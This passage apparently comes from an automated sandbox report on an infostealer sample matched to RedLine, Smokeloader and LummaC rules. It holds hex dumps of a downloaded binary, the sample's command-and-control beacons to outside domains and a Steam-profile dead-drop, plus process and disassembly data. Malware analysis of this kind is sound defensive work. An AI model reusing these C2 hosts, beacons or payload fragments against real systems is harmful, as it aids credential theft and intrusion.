                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658662081 CET1236INData Raw: 82 83 00 00 00 8b de 2b df 8d 43 04 83 f8 04 72 77 57 e8 ec 30 00 00 8b f8 8d 43 04 59 3b f8 73 48 b8 00 08 00 00 3b f8 73 02 8b c7 03 c7 3b c7 72 0f 50 ff 75 fc e8 7a 30 00 00 59 59 85 c0 75 16 8d 47 10 3b c7 72 40 50 ff 75 fc e8 64 30 00 00 59
                                                                                                                                                                                                                                                                  Data Ascii: +CrwW0CY;sH;s;rPuz0YYuG;r@Pud0YYt1P4YluVYhEY3_^[Vjj /VlhujX^&3^jh%DD6%euYEEE`
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658674955 CET1236INData Raw: 33 c0 40 5f 5e c3 83 24 f5 88 41 44 00 00 33 c0 eb f1 8b ff 53 8b 1d cc 10 44 00 56 be 88 41 44 00 57 8b 3e 85 ff 74 13 83 7e 04 01 74 0d 57 ff d3 57 e8 7e f5 ff ff 83 26 00 59 83 c6 08 81 fe a8 42 44 00 7c dc be 88 41 44 00 5f 8b 06 85 c0 74 09
                                                                                                                                                                                                                                                                  Data Ascii: 3@_^$AD3SDVADW>t~tWW~&YBD|AD_t~uPBD|^[UE4ADD]jh%D3G}394nDu$j'#hi YYu4AD9tnj*Y;uu3QjYY]9u,h
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658818960 CET1236INData Raw: 14 50 ff 35 80 b4 81 00 57 ff 35 34 6e 44 00 ff 15 dc 10 44 00 3b c7 75 04 33 c0 eb 78 83 05 8c b4 81 00 10 8b 35 7c b4 81 00 a3 80 b4 81 00 6b f6 14 03 35 80 b4 81 00 68 c4 41 00 00 6a 08 ff 35 34 6e 44 00 ff 15 a8 10 44 00 89 46 10 3b c7 74 c7
                                                                                                                                                                                                                                                                  Data Ascii: P5W54nDD;u3x5|k5hAj54nDDF;tjh hWDF;uvW54nDDN>~|F_^UQQMASVqW3C}i0Dj?EZ@@JujhyhWD
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658829927 CET1236INData Raw: 8b 3b 23 55 f8 23 fe 0b d7 75 0a 83 c3 14 89 5d 08 3b d8 72 e8 3b d8 75 7f 8b 1d 80 b4 81 00 eb 11 8b 53 04 8b 3b 23 55 f8 23 fe 0b d7 75 0a 83 c3 14 89 5d 08 3b d9 72 e8 3b d9 75 5b eb 0c 83 7b 08 00 75 0a 83 c3 14 89 5d 08 3b d8 72 f0 3b d8 75
                                                                                                                                                                                                                                                                  Data Ascii: ;#U#u];r;uS;#U#u];r;u[{u];r;u1{u];r;u]u3S:YKC8tCUt|D#M#u)eHD9#U#uEUi
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658842087 CET1236INData Raw: 33 f6 46 33 db 89 5d e4 83 fe e0 77 69 83 3d 94 b4 81 00 03 75 4b 83 c6 0f 83 e6 f0 89 75 0c 8b 45 08 3b 05 84 b4 81 00 77 37 6a 04 e8 96 f2 ff ff 59 89 7d fc ff 75 08 e8 9c fa ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 5f 00 00 00 8b 5d e4 3b df
                                                                                                                                                                                                                                                                  Data Ascii: 3F3]wi=uKuE;w7jY}uYEE_];tuWS6.;uaVj54nDD;uL9=0sDt3VYrE;PE3uj:Y;uE;t8-t"ttHt3
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658854961 CET1236INData Raw: 00 00 8d 75 ef 8a 0e 84 c9 0f 84 c2 00 00 00 0f b6 46 ff 0f b6 c9 e9 a6 00 00 00 68 01 01 00 00 8d 43 1c 56 50 e8 96 29 00 00 8b 4d e4 83 c4 0c 6b c9 30 89 75 e0 8d b1 e8 46 44 00 89 75 e4 eb 2a 8a 46 01 84 c0 74 28 0f b6 3e 0f b6 c0 eb 12 8b 45
                                                                                                                                                                                                                                                                  Data Ascii: uFhCVP)Mk0uFDu*Ft(>EFDD;FG;v}FF>uuE}ur{CgjCCFDZf1Af0A@@JuL@;vFF~4C@IuCCSs
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658963919 CET1236INData Raw: 00 00 00 85 c0 74 03 50 ff d6 8b 87 b8 00 00 00 85 c0 74 03 50 ff d6 8b 87 b4 00 00 00 85 c0 74 03 50 ff d6 8b 87 c0 00 00 00 85 c0 74 03 50 ff d6 8d 5f 50 c7 45 08 06 00 00 00 81 7b f8 d0 47 44 00 74 09 8b 03 85 c0 74 03 50 ff d6 83 7b fc 00 74
                                                                                                                                                                                                                                                                  Data Ascii: tPtPtPtP_PE{GDttP{tCtPMuP^[_]t7t3V0;t(W8YtVE>YuGDtVYY^3jhx&DT,GDFpt"~ltpluj Yg
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.777564049 CET1236INData Raw: e8 46 e4 ff ff 59 c7 45 fc 01 00 00 00 8b 7e 6c 85 ff 74 23 57 e8 f3 fa ff ff 59 3b 3d b0 48 44 00 74 14 81 ff d8 47 44 00 74 0c 83 3f 00 75 07 57 e8 ff f8 ff ff 59 c7 45 fc fe ff ff ff e8 1e 00 00 00 56 e8 74 d8 ff ff 59 e8 3a ef ff ff c2 04 00
                                                                                                                                                                                                                                                                  Data Ascii: FYE~lt#WY;=HDtGDt?uWYEVtY:ujYujYVWpDV$DuVY^5HDhDWhDWoDhDWoDhDWoD=oD5DoDt=oDt=oDtu$D


                                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.649722104.21.56.704437476C:\Users\user\Desktop\rHrG691f7q.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-14 13:16:18 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: ShareScreen
                                                                                                                                                                                                                                                                  Host: post-to-me.com
                                                                                                                                                                                                                                                                  2024-12-14 13:16:18 UTC800INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 14 Dec 2024 13:16:18 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Tg3bDCtfr4Fl6drrIl%2BAV2p75Nh1vOzBbuzrumL83LOpgpIt54knGtW2qVTKqmZjPCZG0G0buMg3OHCKsadw28AVwcIwmclRSFp%2FfFems6GEbfMpp%2BDbuqst88ACks7dQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f1e77b7ee628c75-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=1935&rtt_var=785&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1509043&cwnd=195&unsent_bytes=0&cid=b4c6311b6eac5a8c&ts=670&x=0"
                                                                                                                                                                                                                                                                  2024-12-14 13:16:18 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                                                                                                  2024-12-14 13:16:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  1192.168.2.649752104.21.22.2224437844C:\Users\user\AppData\Local\Temp\1A68.tmp.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-14 13:16:27 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                                                  Host: immureprech.biz
                                                                                                                                                                                                                                                                  2024-12-14 13:16:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                                                                  2024-12-14 13:16:28 UTC1008INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 14 Dec 2024 13:16:28 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=t2kbglrm708su6ugjanrouepeg; expires=Wed, 09-Apr-2025 07:03:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qJ33TGqgayidZEkBcEoDq4EixyiajUxO1%2Bb48RdZtO7b0F3RbyU3ZxLynZEC4VDN02nOCyvAiNtWfwuN0NsynGgpMLwQUPEmO4J5FJhO1Qm2X7goHvFUVqj0PsLUI4MIdUY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f1e77f1f8ea8c42-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1839&min_rtt=1824&rtt_var=695&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1600877&cwnd=252&unsent_bytes=0&cid=ac1606355b195435&ts=1059&x=0"
                                                                                                                                                                                                                                                                  2024-12-14 13:16:28 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                  2024-12-14 13:16:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  2192.168.2.649759104.21.96.14437844C:\Users\user\AppData\Local\Temp\1A68.tmp.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-14 13:16:29 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                                                  Host: deafeninggeh.biz
                                                                                                                                                                                                                                                                  2024-12-14 13:16:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                                                                  2024-12-14 13:16:30 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 14 Dec 2024 13:16:30 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=gf8buisqh5no27ufeqlu7jkapb; expires=Wed, 09-Apr-2025 07:03:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BBtDWxocfip2S1KB8whrv46QQQVdh4K8bhDZ7oHQ6Ti%2BwgYPgbK3XZsYbxvWF4wacXZ0AlftKsLVW50lucfV2aZSoS6%2B5NZZwbNyZ%2BVwA18C3zcvr%2FlbRBND8Aq9KqeX8kKN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f1e78013cc6c32e-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1696&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1702623&cwnd=178&unsent_bytes=0&cid=0f7256eea46a99c4&ts=888&x=0"
                                                                                                                                                                                                                                                                  2024-12-14 13:16:30 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                  2024-12-14 13:16:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  3192.168.2.64976823.55.153.1064437844C:\Users\user\AppData\Local\Temp\1A68.tmp.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-14 13:16:33 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                                  2024-12-14 13:16:34 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Date: Sat, 14 Dec 2024 13:16:34 GMT
                                                                                                                                                                                                                                                                  Content-Length: 35131
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: sessionid=8f6588a84e666db3c620827b; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                  2024-12-14 13:16:34 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                  2024-12-14 13:16:34 UTC10097INData Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55
                                                                                                                                                                                                                                                                  Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
                                                                                                                                                                                                                                                                  2024-12-14 13:16:34 UTC10555INData Raw: 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75
                                                                                                                                                                                                                                                                  Data Ascii: ;WEB_UNIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&qu


                                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                  Start time:08:16:12
                                                                                                                                                                                                                                                                  Start date:14/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\rHrG691f7q.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\rHrG691f7q.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                  File size:429'056 bytes
                                                                                                                                                                                                                                                                  MD5 hash:F610013D7C84F779AFA017218890E7CE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                  Start time:08:16:21
                                                                                                                                                                                                                                                                  Start date:14/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1A68.tmp.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1A68.tmp.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                  File size:361'984 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.2433571436.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                  • Detection: 42%, ReversingLabs
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                  Start time:08:16:34
                                                                                                                                                                                                                                                                  Start date:14/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7844 -s 612
                                                                                                                                                                                                                                                                  Imagebase:0xe60000
                                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:2.5%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:3.7%
                                                                                                                                                                                                                                                                    Signature Coverage:5.7%
                                                                                                                                                                                                                                                                    Total number of Nodes:759
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:21
                                                                                                                                                                                                                                                                    execution_graph 64394 24c003c 64395 24c0049 64394->64395 64409 24c0e0f SetErrorMode SetErrorMode 64395->64409 64400 24c0265 64401 24c02ce VirtualProtect 64400->64401 64403 24c030b 64401->64403 64402 24c0439 VirtualFree 64407 24c05f4 LoadLibraryA 64402->64407 64408 24c04be 64402->64408 64403->64402 64404 24c04e3 LoadLibraryA 64404->64408 64406 24c08c7 64407->64406 64408->64404 64408->64407 64410 24c0223 64409->64410 64411 24c0d90 64410->64411 64412 24c0dad 64411->64412 64413 24c0dbb GetPEB 64412->64413 64414 24c0238 VirtualAlloc 64412->64414 64413->64414 64414->64400 64415 402c04 InternetOpenW 64416 402e55 64415->64416 64419 402c37 StructuredWorkStealingQueue 64415->64419 64436 40f8cf 64416->64436 64418 402e64 64427 42defd 64419->64427 64422 42defd std::_Locinfo::_Locinfo_dtor 26 API calls 64423 402e17 64422->64423 64424 42defd std::_Locinfo::_Locinfo_dtor 26 API calls 64423->64424 64425 402e29 InternetOpenUrlW 64424->64425 64425->64416 64426 402e44 InternetCloseHandle InternetCloseHandle 64425->64426 64426->64416 64428 42df1a 64427->64428 64429 42df0c 64427->64429 64443 42eac9 20 API calls __Wcrtomb 64428->64443 64429->64428 64433 42df4a 64429->64433 64432 402e09 64432->64422 64433->64432 64445 42eac9 20 API calls __Wcrtomb 64433->64445 64435 42df24 64444 42a59d 26 API calls _Deallocate 64435->64444 64437 40f8d8 64436->64437 64438 40f8da IsProcessorFeaturePresent 64436->64438 64437->64418 64440 40f94d 64438->64440 64446 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64440->64446 64442 40fa30 64442->64418 64443->64435 64444->64432 64445->64435 64446->64442 64447 40fc06 64448 40fc12 ___scrt_is_nonwritable_in_current_image 64447->64448 64476 40fff3 64448->64476 64450 40fc19 64451 40fd6c 64450->64451 64454 40fc43 64450->64454 64497 4104d3 4 API calls 2 library calls 64451->64497 64453 40fd73 64498 42ffc9 28 API calls _Atexit 64453->64498 64465 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64454->64465 64491 42fcee 5 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 64454->64491 64456 40fd79 64499 42ff7b 28 API calls _Atexit 64456->64499 64459 40fc5c 64461 40fc62 64459->64461 64492 42fc92 5 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 64459->64492 64460 40fd81 64463 40fce3 64487 4105ed 64463->64487 64465->64463 64493 42a366 167 API calls 4 library calls 64465->64493 64467 